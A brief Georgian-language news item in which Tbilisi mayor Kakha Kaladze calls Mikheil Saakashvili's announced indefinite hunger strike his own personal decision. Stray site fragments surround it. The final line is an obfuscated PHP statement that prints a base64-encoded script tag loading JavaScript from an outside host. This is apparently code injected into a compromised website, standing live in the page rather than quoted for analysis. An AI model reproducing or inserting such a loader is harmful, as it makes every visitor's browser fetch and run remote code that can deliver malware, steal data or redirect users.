celsiusi
ავერსი საქკაბელი
დედაქალაქის მერი კახა კალაძე მიხეილ სააკაშვილის მიერ გამოცხადებულ უვადო შიმშილობის საკითხს ეხმაურება და ამბობს, რომ შიმშილის დაწყება არის სააკაშვილის პირადი საქმე და ამაში ხელს ვერავინ შეუშლის.
 
„ეს მისი გადასაწყვეტია, თვითონ როგორც უნდა, ისე გადაწყვეტს. ვერავინ შეუშლის ამაში ხელს და ვერავინ შეაჩერებს. ეს არის მისი პირადი გადაწყვეტილება, თვითონ იღებს გადაწყვეტილებას, როგორ იმოქმედოს და რა გააკეთოს. რა პოლიტიკური დღის წესრიგი უნდა შეცვალოს? ეს მისი გადასაწყვეტია, უნდა იშიმშილოს ან რამდენიც უნდა იმდენი ჭამოს, ვინ უშლის ხელს?" - განაცხადა კალაძემ.
 
შეგახსენებთ, რომ გუშინ საქართველოს მესამე პრეზიდენტმა მიხეილ სააკაშვილმა, 7 ნოემბრის საქმეზე გამართული პროცესის მიმდინარეობისას, უვადო შიმშილობის შესახებ განაცხადი გააკეთა. 
1206
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");